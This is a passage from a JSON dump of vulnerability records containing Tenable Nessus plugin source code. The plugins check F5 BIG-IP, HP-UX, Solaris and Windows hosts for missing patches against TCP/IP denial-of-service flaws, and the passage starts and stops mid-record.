value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL4583\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"10.1.0-10.2.2\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"10.2.2HF2\",\"10.2.3-10.2.4\",\"11\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"9.2.0-9.2.5\",\"9.4.0-9.4.8\",\"10.0.0-10.2.2\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"9.3\",\"10.2.2HF2\",\"10.2.3-10.2.4\",\"11\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"9.2.2-9.2.5\",\"9.4.0-9.4.8\",\"10.0.0-10.2.2\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"9.3\",\"10.2.2HF2\",\"10.2.3-10.2.4\",\"11\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"9.0.0-9.0.5\",\"9.1.0-9.1.3\",\"9.2.0-9.2.5\",\"9.4.0-9.4.8\",\"9.6.0-9.6.1\",\"10.0.0-10.2.2\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"9.3\",\"10.2.2HF2\",\"10.2.3-10.2.4\",\"11\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"9.4.5-9.4.8\",\"10.0.0-10.2.2\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"10.2.2HF2\",\"10.2.3-10.2.4\",\"11\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"9.4.0-9.4.8\",\"10.0.0-10.2.2\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"10.2.2HF2\",\"10.2.3-10.2.4\",\"11\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"10.0.0-10.2.2\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"10.2.2HF2\",\"10.2.3-10.2.4\",\"11\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:17:22", "description": "s700_800 11.04 (VVOS) ndd(1M) cumulative patch : \n\nA potential security vulnerability has been identified with HP-UX running TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). References: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.", "cvss3": {"score": null, "vector": null}, "published": "2005-05-30T00:00:00", "type": "nessus", "title": "HP-UX PHNE_26076 : HP-UX TCP/IP Remote Denial of Service (DoS) (HPSBUX01164 SSRT4884 rev.9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_26076.NASL", "href": "https://www.tenable.com/plugins/nessus/18398", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_26076. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18398);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\");\n script_bugtraq_id(13124);\n script_xref(name:\"CERT\", value:\"532967\");\n script_xref(name:\"HP\", value:\"emr_na-c00576017\");\n script_xref(name:\"HP\", value:\"HPSBUX01164\");\n script_xref(name:\"HP\", value:\"SSRT4884\");\n\n script_name(english:\"HP-UX PHNE_26076 : HP-UX TCP/IP Remote Denial of Service (DoS) (HPSBUX01164 SSRT4884 rev.9)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 (VVOS) ndd(1M) cumulative patch : \n\nA potential security vulnerability has been identified with HP-UX\nrunning TCP/IP. This vulnerability could be remotely exploited by an\nunauthorized user to cause a Denial of Service(DoS). References: NISCC\nVU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00576017\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a3e8ad7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_26076 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/03/21\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/05/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/04/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHNE_26076 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_26076\", \"PHNE_33789\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.NET-RUN\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"Networking.NW-ENG-A-MAN\", version:\"B.11.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:16:55", "description": "s700_800 11.00 cumulative ARPA Transport patch : \n\nA potential security vulnerability has been identified with HP-UX running TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). References: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.", "cvss3": {"score": null, "vector": null}, "published": "2005-08-01T00:00:00", "type": "nessus", "title": "HP-UX PHNE_33395 : HP-UX TCP/IP Remote Denial of Service (DoS) (HPSBUX01164 SSRT4884 rev.9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_33395.NASL", "href": "https://www.tenable.com/plugins/nessus/19363", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_33395. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19363);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\");\n script_bugtraq_id(13124);\n script_xref(name:\"CERT\", value:\"532967\");\n script_xref(name:\"HP\", value:\"emr_na-c00576017\");\n script_xref(name:\"HP\", value:\"HPSBUX01164\");\n script_xref(name:\"HP\", value:\"SSRT4884\");\n\n script_name(english:\"HP-UX PHNE_33395 : HP-UX TCP/IP Remote Denial of Service (DoS) (HPSBUX01164 SSRT4884 rev.9)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 cumulative ARPA Transport patch : \n\nA potential security vulnerability has been identified with HP-UX\nrunning TCP/IP. This vulnerability could be remotely exploited by an\nunauthorized user to cause a Denial of Service(DoS). References: NISCC\nVU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00576017\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a3e8ad7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_33395 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/19\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/08/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/04/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_33395 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_33395\", \"PHNE_35729\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.NET-KRN\", version:\"B.11.00\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-PRG\", version:\"B.11.00\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-RUN\", version:\"B.11.00\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET2-KRN\", version:\"B.11.00\")) flag++;\nif (hpux_check_patch(app:\"Networking.NMS2-KRN\", version:\"B.11.00\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE2-KRN\", version:\"B.11.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:17:27", "description": "SunOS 5.9: tcp Patch.\nDate this patch was last updated by Sun : Jul/09/07", "cvss3": {"score": null, "vector": null}, "published": "2005-04-17T00:00:00", "type": "nessus", "title": "Solaris 9 (sparc) : 118305-10", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2006-3920"], "modified": "2011-09-18T00:00:00", "cpe": [], "id": "SOLARIS9_118305.NASL", "href": "https://www.tenable.com/plugins/nessus/18075", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(18075);\n script_version(\"1.33\");\n\n script_name(english: \"Solaris 9 (sparc) : 118305-10\");\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2006-3920\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 118305-10\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.9: tcp Patch.\nDate this patch was last updated by Sun : Jul/09/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/118305-10\");\n script_set_attribute(attribute: \"cvss_vector\", value: \"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/04/17\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/09/07\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 118305-10\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"118305-10\", obsoleted_by:\"114344-32 \", package:\"SUNWcarx\", version:\"11.9.0,REV=2002.04.06.15.27\");\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"118305-10\", obsoleted_by:\"114344-32 \", package:\"SUNWcarx\", version:\"11.9.0,REV=2002.04.09.12.25\");\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"118305-10\", obsoleted_by:\"114344-32 \", package:\"SUNWcsr\", version:\"11.9.0,REV=2002.04.06.15.27\");\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"118305-10\", obsoleted_by:\"114344-32 \", package:\"SUNWcsu\", version:\"11.9.0,REV=2002.04.06.15.27\");\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"118305-10\", obsoleted_by:\"114344-32 \", package:\"SUNWhea\", version:\"11.9.0,REV=2002.04.06.15.27\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_warning(0);\n\telse \n\t security_warning(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:17:21", "description": "s700_800 11.00 ndd(1M) cumulative patch : \n\nA potential security vulnerability has been identified with HP-UX running TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). References: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.", "cvss3": {"score": null, "vector": null}, "published": "2005-05-30T00:00:00", "type": "nessus", "title": "HP-UX PHNE_26125 : HP-UX TCP/IP Remote Denial of Service (DoS) (HPSBUX01164 SSRT4884 rev.9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_26125.NASL", "href": "https://www.tenable.com/plugins/nessus/18399", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_26125. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18399);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\");\n script_bugtraq_id(13124);\n script_xref(name:\"CERT\", value:\"532967\");\n script_xref(name:\"HP\", value:\"emr_na-c00576017\");\n script_xref(name:\"HP\", value:\"HPSBUX01164\");\n script_xref(name:\"HP\", value:\"SSRT4884\");\n\n script_name(english:\"HP-UX PHNE_26125 : HP-UX TCP/IP Remote Denial of Service (DoS) (HPSBUX01164 SSRT4884 rev.9)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 ndd(1M) cumulative patch : \n\nA potential security vulnerability has been identified with HP-UX\nrunning TCP/IP. This vulnerability could be remotely exploited by an\nunauthorized user to cause a Denial of Service(DoS). References: NISCC\nVU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00576017\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a3e8ad7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_26125 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/02/11\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/05/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/04/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_26125 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_26125\", \"PHNE_31965\", \"PHNE_35730\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.NET-RUN\", version:\"B.11.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:17:26", "description": "SunOS 5.9_x86: tcp Patch.\nDate this patch was last updated by Sun : Jul/09/07", "cvss3": {"score": null, "vector": null}, "published": "2005-04-17T00:00:00", "type": "nessus", "title": "Solaris 9 (x86) : 117470-09", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2006-3920"], "modified": "2011-09-18T00:00:00", "cpe": [], "id": "SOLARIS9_X86_117470.NASL", "href": "https://www.tenable.com/plugins/nessus/18079", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(18079);\n script_version(\"1.30\");\n\n script_name(english: \"Solaris 9 (x86) : 117470-09\");\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2006-3920\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 117470-09\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.9_x86: tcp Patch.\nDate this patch was last updated by Sun : Jul/09/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/117470-09\");\n script_set_attribute(attribute: \"cvss_vector\", value: \"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/04/17\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/09/07\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 117470-09\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"117470-09\", obsoleted_by:\"119435-20 \", package:\"SUNWcsr\", version:\"11.9.0,REV=2002.11.04.02.51\");\ne += solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"117470-09\", obsoleted_by:\"119435-20 \", package:\"SUNWcsu\", version:\"11.9.0,REV=2002.11.04.02.51\");\ne += solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"117470-09\", obsoleted_by:\"119435-20 \", package:\"SUNWhea\", version:\"11.9.0,REV=2002.11.04.02.51\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_warning(0);\n\telse \n\t security_warning(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:15:18", "description": "The remote host runs a version of Windows that has a flaw in its TCP/IP IPv6 stack.\n\nThe flaw could allow an attacker to perform a denial of service attack against the remote host.\n\nTo exploit this vulnerability, an attacker needs to send a specially crafted ICMP or TCP packet to the remote host.", "cvss3": {"score": null, "vector": null}, "published": "2006-10-10T00:00:00", "type": "nessus", "title": "MS06-064: Vulnerability in TCP/IP IPv6 Could Allow Denial of Service (922819)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0230", "CVE-2005-0688"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS06-064.NASL", "href": "https://www.tenable.com/plugins/nessus/22537", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22537);\n script_version(\"1.31\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2004-0790\",\"CVE-2004-0230\",\"CVE-2005-0688\");\n script_bugtraq_id(13124, 13658);\n script_xref(name:\"CERT\", value:\"415294\");\n script_xref(name:\"CERT\", value:\"222750\");\n script_xref(name:\"CERT\", value:\"396645\");\n script_xref(name:\"MSFT\", value:\"MS06-064\");\n script_xref(name:\"MSKB\", value:\"922819\");\n\n script_name(english:\"MS06-064: Vulnerability in TCP/IP IPv6 Could Allow Denial of Service (922819)\");\n script_summary(english:\"Checks the remote registry for 922819\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"It is possible to crash the remote host due to a flaw in the TCP/IP\nIPv6 stack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host runs a version of Windows that has a flaw in its\nTCP/IP IPv6 stack.\n\nThe flaw could allow an attacker to perform a denial of service attack\nagainst the remote host.\n\nTo exploit this vulnerability, an attacker needs to send a specially\ncrafted ICMP or TCP packet to the remote host.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-064\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Windows XP and 2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n 